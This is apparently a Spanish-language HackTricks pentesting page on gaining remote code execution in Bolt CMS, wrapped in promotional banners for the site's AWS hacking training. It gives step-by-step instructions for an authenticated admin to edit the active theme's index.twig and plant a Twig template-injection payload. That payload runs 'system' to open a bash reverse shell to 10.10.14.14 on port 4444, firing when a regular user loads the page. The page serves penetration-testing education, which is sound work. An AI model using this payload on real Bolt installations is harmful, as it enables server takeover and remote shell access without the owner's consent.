hacktricks/network-services-pentesting/pentesting-web/bolt-cms.md

3.5 KiB

Bolt CMS

Aprende hacking en AWS de cero a héroe con htARTE (Experto en Red Team de AWS de HackTricks)!

Otras formas de apoyar a HackTricks:

RCE

Después de iniciar sesión como administrador (ve a /bot para acceder al prompt de inicio de sesión), puedes obtener RCE en Bolt CMS:

  • Selecciona Configuración -> Ver Configuración -> Configuración Principal o ve a la ruta de URL /bolt/file-edit/config?file=/bolt/config.yaml
  • Verifica el valor del tema
  • Selecciona Gestión de archivos -> Ver y editar plantillas
  • Selecciona la base del tema encontrada en el paso anterior (base-2021 en este caso) y selecciona index.twig
  • En mi caso, esto está en la ruta de URL /bolt/file-edit/themes?file=/base-2021/index.twig
  • Establece tu carga útil en este archivo a través de la inyección de plantillas (Twig), como: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
  • Y guarda los cambios
  • Borra la caché en Mantenimiento -> Borrar la caché
  • Accede nuevamente a la página como un usuario regular, y la carga útil debería ejecutarse
Aprende hacking en AWS de cero a héroe con htARTE (Experto en Red Team de AWS de HackTricks)!

Otras formas de apoyar a HackTricks: